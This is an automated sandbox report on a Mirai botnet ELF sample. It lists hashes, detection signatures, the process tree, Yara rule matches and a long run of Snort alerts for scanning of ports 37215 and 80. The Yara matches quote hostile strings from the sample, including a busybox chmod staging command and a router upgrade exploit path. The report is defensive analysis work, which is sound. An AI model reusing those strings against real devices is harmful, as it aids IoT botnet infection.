Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
s8y4CBbFHW.elf

Overview

General Information

Sample name:s8y4CBbFHW.elf
renamed because original name is a hash value
Original sample name:20bc328ef0647aac4fca80a0067e38f8.elf
Analysis ID:1454605
MD5:20bc328ef0647aac4fca80a0067e38f8
SHA1:e6aed42419880ef850f77f1ccbe402361bccb9fe
SHA256:1cfa6726bfb6144cf26150f61c43716f48e0794f0f950ee40d5316fb9435ea37
Tags:32elfmirairenesas
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1454605
Start date and time:2024-06-10 15:37:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:s8y4CBbFHW.elf
renamed because original name is a hash value
Original Sample Name:20bc328ef0647aac4fca80a0067e38f8.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/1@25/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: s8y4CBbFHW.elf
Command:/tmp/s8y4CBbFHW.elf
PID:5432
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • wrapper-2.0 (PID: 5457, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5458, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5459, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5460, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
    • xfpm-power-backlight-helper (PID: 5479, Parent: 5460, MD5: 3d221ad23f28ca3259f599b1664e2427) Arguments: /usr/sbin/xfpm-power-backlight-helper --get-max-brightness
  • wrapper-2.0 (PID: 5461, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5462, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • xfconfd (PID: 5478, Parent: 5477, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
  • systemd New Fork (PID: 5487, Parent: 2935)
  • xfce4-notifyd (PID: 5487, Parent: 2935, MD5: eee956f1b227c1d5031f9c61223255d1) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
s8y4CBbFHW.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    s8y4CBbFHW.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      s8y4CBbFHW.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        s8y4CBbFHW.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
        • 0x1092a:$x2: /bin/busybox chmod 777 * /tmp/
        • 0x1066c:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        • 0x105ec:$s3: POST /cdn-cgi/
        s8y4CBbFHW.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
        • 0x105ec:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
        SourceRuleDescriptionAuthorStrings
        5441.1.00007f5714400000.00007f5714412000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
          5441.1.00007f5714400000.00007f5714412000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5441.1.00007f5714400000.00007f5714412000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5441.1.00007f5714400000.00007f5714412000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
              • 0x1092a:$x2: /bin/busybox chmod 777 * /tmp/
              • 0x1066c:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              • 0x105ec:$s3: POST /cdn-cgi/
              5441.1.00007f5714400000.00007f5714412000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
              • 0x105ec:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
              Click to see the 25 entries
              Timestamp:06/10/24-15:38:02.922975
              SID:2829579
              Source Port:33046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.230283
              SID:2835222
              Source Port:53326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.986870
              SID:2835222
              Source Port:57044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.759599
              SID:2829579
              Source Port:43962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.120500
              SID:2030092
              Source Port:54986
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.089268
              SID:2030092
              Source Port:40248
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.751686
              SID:2829579
              Source Port:53884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.134117
              SID:2030092
              Source Port:41286
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.996932
              SID:2829579
              Source Port:38538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.747937
              SID:2030092
              Source Port:32824
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.194608
              SID:2030092
              Source Port:41838
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.239619
              SID:2030092
              Source Port:48010
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.207442
              SID:2030092
              Source Port:47142
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.931967
              SID:2829579
              Source Port:37610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.827129
              SID:2829579
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.933966
              SID:2835222
              Source Port:56460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.687592
              SID:2829579
              Source Port:56152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.178384
              SID:2030092
              Source Port:40916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.809084
              SID:2025883
              Source Port:35328
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.195434
              SID:2829579
              Source Port:34518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.946134
              SID:2835222
              Source Port:33492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.306024
              SID:2030092
              Source Port:58582
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.162235
              SID:2835222
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.734955
              SID:2829579
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.999497
              SID:2829579
              Source Port:37368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.647915
              SID:2829579
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.203547
              SID:2829579
              Source Port:45678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.238002
              SID:2829579
              Source Port:57242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.488949
              SID:2835222
              Source Port:38910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.933051
              SID:2835222
              Source Port:53100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.834263
              SID:2829579
              Source Port:39336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.160743
              SID:2835222
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.192815
              SID:2030092
              Source Port:47476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.097659
              SID:2030092
              Source Port:33038
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.088585
              SID:2025883
              Source Port:42532
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.965473
              SID:2835222
              Source Port:48328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.790906
              SID:2025883
              Source Port:41002
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.095481
              SID:2030092
              Source Port:57206
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.165713
              SID:2835222
              Source Port:36522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.510425
              SID:2829579
              Source Port:37076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.797691
              SID:2025883
              Source Port:39842
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.983452
              SID:2835222
              Source Port:44048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.317684
              SID:2030092
              Source Port:40720
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.657284
              SID:2835222
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.973933
              SID:2835222
              Source Port:60388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.188379
              SID:2829579
              Source Port:44576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.652273
              SID:2835222
              Source Port:35332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.085779
              SID:2030092
              Source Port:50556
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.942479
              SID:2835222
              Source Port:55606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.798921
              SID:2829579
              Source Port:58940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.970506
              SID:2829579
              Source Port:60046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.197151
              SID:2835222
              Source Port:48674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.187428
              SID:2030092
              Source Port:49758
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.201308
              SID:2030092
              Source Port:41832
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.756001
              SID:2025883
              Source Port:53434
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.001255
              SID:2829579
              Source Port:37376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.239703
              SID:2829579
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.212309
              SID:2835222
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.502251
              SID:2835222
              Source Port:51694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.788491
              SID:2030092
              Source Port:46042
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.723332
              SID:2829579
              Source Port:47500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.019873
              SID:2829579
              Source Port:41708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.100541
              SID:2030092
              Source Port:60212
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.778188
              SID:2835222
              Source Port:36016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.862438
              SID:2829579
              Source Port:57532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.869004
              SID:2829579
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.183832
              SID:2835222
              Source Port:50966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.135367
              SID:2030092
              Source Port:56392
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.925134
              SID:2835222
              Source Port:60470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.644982
              SID:2835222
              Source Port:60718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.261547
              SID:2829579
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.689784
              SID:2829579
              Source Port:55340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.118012
              SID:2030092
              Source Port:40336
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.259702
              SID:2030092
              Source Port:48706
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.776905
              SID:2829579
              Source Port:46860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.231962
              SID:2835222
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.039932
              SID:2835222
              Source Port:38456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.233672
              SID:2835222
              Source Port:59904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.113559
              SID:2030092
              Source Port:47840
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.012794
              SID:2835222
              Source Port:49156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.170870
              SID:2835222
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.500162
              SID:2835222
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.173963
              SID:2829579
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.712763
              SID:2835222
              Source Port:56980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.943966
              SID:2829579
              Source Port:60614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.984293
              SID:2829579
              Source Port:52668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.808787
              SID:2835222
              Source Port:53890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.201249
              SID:2829579
              Source Port:56976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.657974
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.250691
              SID:2030092
              Source Port:33128
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.980839
              SID:2829579
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.002985
              SID:2835222
              Source Port:34412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.869779
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.928461
              SID:2835222
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.208966
              SID:2835222
              Source Port:42074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.162961
              SID:2835222
              Source Port:55306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.775920
              SID:2829579
              Source Port:35870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.266123
              SID:2829579
              Source Port:37370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.740863
              SID:2829579
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.995486
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.017705
              SID:2835222
              Source Port:44662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.879110
              SID:2829579
              Source Port:58050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.118708
              SID:2030092
              Source Port:41168
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.677116
              SID:2829579
              Source Port:45284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.243236
              SID:2829579
              Source Port:34724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.211759
              SID:2030092
              Source Port:36122
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.913437
              SID:2835222
              Source Port:59684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.820455
              SID:2025883
              Source Port:48502
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.974792
              SID:2835222
              Source Port:44740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.864921
              SID:2030092
              Source Port:37108
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.258036
              SID:2835222
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.183026
              SID:2835222
              Source Port:53528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.497343
              SID:2835222
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.020596
              SID:2835222
              Source Port:56620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.975667
              SID:2835222
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.780766
              SID:2829579
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.215590
              SID:2829579
              Source Port:57534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.666292
              SID:2829579
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.978246
              SID:2835222
              Source Port:60256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.491066
              SID:2829579
              Source Port:47950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.193307
              SID:2835222
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.767523
              SID:2030092
              Source Port:60126
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.660067
              SID:2835222
              Source Port:60882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.836583
              SID:2829579
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.163693
              SID:2835222
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.004662
              SID:2835222
              Source Port:53414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.674620
              SID:2829579
              Source Port:54890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.263049
              SID:2835222
              Source Port:57558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.033459
              SID:2829579
              Source Port:36414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.121619
              SID:2030092
              Source Port:51760
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.763209
              SID:2829579
              Source Port:43930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.762945
              SID:2025883
              Source Port:50134
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.030618
              SID:2829579
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.507632
              SID:2829579
              Source Port:60618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.771027
              SID:2835222
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.768716
              SID:2835222
              Source Port:53660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.988624
              SID:2829579
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.253141
              SID:2835222
              Source Port:42484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.851207
              SID:2835222
              Source Port:55572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.938715
              SID:2829579
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.173369
              SID:2030092
              Source Port:45780
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.936837
              SID:2829579
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.261108
              SID:2030092
              Source Port:47972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.994517
              SID:2829579
              Source Port:39806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.754766
              SID:2829579
              Source Port:59676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.029895
              SID:2829579
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.200092
              SID:2030092
              Source Port:41896
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.779348
              SID:2835222
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.860487
              SID:2829579
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
